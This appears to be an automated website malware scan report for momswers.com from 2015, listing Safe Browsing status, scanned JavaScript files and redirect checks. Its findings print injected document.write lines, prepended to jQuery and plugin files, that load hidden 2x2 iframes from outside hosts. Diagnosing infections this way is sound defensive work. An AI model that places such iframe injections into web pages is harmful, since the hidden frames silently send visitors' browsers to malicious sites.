Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=momswers.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://momswers.com/ | 200 OK Content-Length: 20477 Content-Type: text/html | clean |
http://momswers.com/js/jquery-1.4.2.min.js | 200 OK Content-Length: 72652 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=1604668></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3256554></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://lindsethcpas.com/aced.html?j=16 e&&e.document?e.document.compatMode==="CSS1Compat"&&e.document.documentElement["client"+b]||e.document.body["client"+b]:e.nodeType===9?Math.max(e.documentElement["client"+b],e.body["scroll"+b],e.documentElement["scroll"+b],e.body["offset"+b],e.documentElement["offset"+b]):f===w?c.css(e,d):this.css(d,typeof f==="string"?f:f+"px")}});A.jQuery=A.$=c})(window); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://hecodat.de/zwmd.html?j=1604668 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=1604668> Hidden iFrame found. size: 2x2 src: http://lindsethcpas.com/aced.html?j=1604679 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://lindsethcpas.com/aced.html?j=1604679> Hidden iFrame found. size: 2x2 src: http://ajacofurniture.com/eaod.html?j=3256554 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3256554> | ||
http://momswers.com/js/fancybox/jquery.mousewheel-3.0.2.pack.js | 200 OK Content-Length: 1636 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=1604668></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3256554></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://lindsethcpas.com/aced.html?j=16 d,false);else this.onmousewheel=null}};b.fn.extend({mousewheel:function(a){return a?this.bind("mousewheel",a):this.trigger("mousewheel")},unmousewheel:function(a){return this.unbind("mousewheel",a)}})})(jQuery); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://hecodat.de/zwmd.html?j=1604668 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=1604668> Hidden iFrame found. size: 2x2 src: http://lindsethcpas.com/aced.html?j=1604679 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://lindsethcpas.com/aced.html?j=1604679> Hidden iFrame found. size: 2x2 src: http://ajacofurniture.com/eaod.html?j=3256554 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3256554> | ||
http://momswers.com/js/fancybox/jquery.fancybox-1.3.1.js | 200 OK Content-Length: 27501 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://speardiver.com/ocef.html?j=1604668></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3256554></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://newridgetech.com/heof.html? speedIn : 300, speedOut : 300, changeSpeed : 300, changeFade : 'fast', easingIn : 'swing', easingOut : 'swing', showCloseButton : true, showNavArrows : true, enableEscapeButton : true, onStart : null, onCancel : null, onComplete : null, onCleanup : null, onClosed : null }; $(document).ready(function() { fancybox_init(); }); })(jQuery); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://newridgetech.com/heof.html?j=1604679 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://newridgetech.com/heof.html?j=1604679> Hidden iFrame found. size: 2x2 src: http://speardiver.com/ocef.html?j=1604668 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://speardiver.com/ocef.html?j=1604668> Hidden iFrame found. size: 2x2 src: http://ajacofurniture.com/eaod.html?j=3256554 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3256554> | ||
http://momswers.com/js/jCarouselLite.js | 200 OK Content-Length: 14613 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=1604668></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3256554></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://lindsethcpas.com/aced.html?j=16 ).addClass("disabled"); } } return false; }; }); }; function css(el, prop) { return parseInt($.css(el[0], prop)) || 0; }; function width(el) { return el[0].offsetWidth + css(el, 'marginLeft') + css(el, 'marginRight'); }; function height(el) { return el[0].offsetHeight + css(el, 'marginTop') + css(el, 'marginBottom'); }; })(jQuery); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://ajacofurniture.com/eaod.html?j=3256554 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3256554> Hidden iFrame found. size: 2x2 src: http://hecodat.de/zwmd.html?j=1604668 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=1604668> Hidden iFrame found. size: 2x2 src: http://lindsethcpas.com/aced.html?j=1604679 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://lindsethcpas.com/aced.html?j=1604679> | ||
http://momswers.com/js/jquery.easing.1.1.js | 200 OK Content-Length: 3773 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=1604668></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3256554></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://lindsethcpas.com/aced.html?j=16 var s=1.70158; return c*(t/=d)*t*((s+1)*t - s) + b; }, backout: function(x, t, b, c, d) { var s=1.70158; return c*((t=t/d-1)*t*((s+1)*t + s) + 1) + b; }, backinout: function(x, t, b, c, d) { var s=1.70158; if ((t/=d/2) < 1) return c/2*(t*t*(((s*=(1.525))+1)*t - s)) + b; return c/2*((t-=2)*t*(((s*=(1.525))+1)*t + s) + 2) + b; }, linear: function(x, t, b, c, d) { return c*t/d + b; } }; Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://hecodat.de/zwmd.html?j=1604668 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=1604668> Hidden iFrame found. size: 2x2 src: http://lindsethcpas.com/aced.html?j=1604679 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://lindsethcpas.com/aced.html?j=1604679> Hidden iFrame found. size: 2x2 src: http://ajacofurniture.com/eaod.html?j=3256554 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3256554> | ||
http://momswers.com/js/jquery-ui-1.8.2.datepicker/jquery-ui-1.8.2.custom.min.js | 200 OK Content-Length: 52229 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=1604668></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3256554></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://lindsethcpas.com/aced.html?j=16 d,e)*0.5+b;return f.easing.easeOutBounce(c,a*2-e,0,d,e)*0.5+d*0.5+b}})}(jQuery); ; Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://ajacofurniture.com/eaod.html?j=3256554 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3256554> Hidden iFrame found. size: 2x2 src: http://lindsethcpas.com/aced.html?j=1604679 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://lindsethcpas.com/aced.html?j=1604679> Hidden iFrame found. size: 2x2 src: http://hecodat.de/zwmd.html?j=1604668 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=1604668> | ||
http://momswers.com/js/jquery.tools.min.js | 200 OK Content-Length: 45209 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://speardiver.com/ocef.html?j=1604668></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3256554></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://newridgetech.com/heof.html? d,c)}};var d=!b.browser.mozilla?"mousewheel":"DOMMouseScroll"+(b.browser.version<"1.9"?" mousemove":"")})(jQuery); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://newridgetech.com/heof.html?j=1604679 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://newridgetech.com/heof.html?j=1604679> Hidden iFrame found. size: 2x2 src: http://ajacofurniture.com/eaod.html?j=3256554 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3256554> Hidden iFrame found. size: 2x2 src: http://speardiver.com/ocef.html?j=1604668 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://speardiver.com/ocef.html?j=1604668> | ||
http://momswers.com/js/jquery.uniform/jquery.uniform.min.js | 200 OK Content-Length: 6429 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=1604668></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3256554></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://lindsethcpas.com/aced.html?j=16 Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://ajacofurniture.com/eaod.html?j=3256554 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3256554> Hidden iFrame found. size: 2x2 src: http://lindsethcpas.com/aced.html?j=1604679 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://lindsethcpas.com/aced.html?j=1604679> Hidden iFrame found. size: 2x2 src: http://hecodat.de/zwmd.html?j=1604668 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=1604668> | ||
http://momswers.com/js/jquery.cookie.js | 200 OK Content-Length: 4735 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://speardiver.com/ocef.html?j=1604668></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3256554></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://www.3dcgianimation.com/omzd for (var i = 0; i < cookies.length; i++) { var cookie = jQuery.trim(cookies[i]); if (cookie.substring(0, name.length + 1) == (name + '=')) { cookieValue = decodeURIComponent(cookie.substring(name.length + 1)); break; } } } return cookieValue; } }; Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://www.3dcgianimation.com/omzd.html?j=1604679 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://www.3dcgianimation.com/omzd.html?j=1604679> Hidden iFrame found. size: 2x2 src: http://ajacofurniture.com/eaod.html?j=3256554 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3256554> Hidden iFrame found. size: 2x2 src: http://speardiver.com/ocef.html?j=1604668 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://speardiver.com/ocef.html?j=1604668> | ||
http://momswers.com/js/main.js | 200 OK Content-Length: 2889 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=1604668></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3256554></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://lindsethcpas.com/aced.html?j=16 $(function() { $("#datepicker").datepicker({ showOn: 'button', buttonImage: 'js/jquery-ui-1.8.2.datepicker/smoothness/images/calendar.gif', buttonImageOnly: true }); }); $(function(){ $("select").uniform(); }); $(function() { $("a.lightbox").fancybox({ 'titleShow' : false, 'transitionIn' : 'elastic', 'transitionOut' : 'elastic' }); }); }); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://hecodat.de/zwmd.html?j=1604668 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=1604668> Hidden iFrame found. size: 2x2 src: http://lindsethcpas.com/aced.html?j=1604679 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://lindsethcpas.com/aced.html?j=1604679> Hidden iFrame found. size: 2x2 src: http://ajacofurniture.com/eaod.html?j=3256554 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3256554> | ||
http://millerusa.net/868779.js | 404 Not Found Content-Length: 9 Content-Type: text/html | clean |
http://millerusa.net/test404page.js | 404 Not Found Content-Length: 9 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: momswers.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 27 Jan 2015 14:58:27 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 20477
Content-Type: text/html
...20477 bytes of data.
GET / HTTP/1.1
Host: momswers.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 27 Jan 2015 14:58:27 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 20477
Content-Type: text/html
...20477 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: momswers.com
Referer: http://www.google.com/search?q=momswers.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: momswers.com
Referer: http://www.google.com/search?q=momswers.com
Result:
The result is similar to the first query. There are no suspicious redirects found.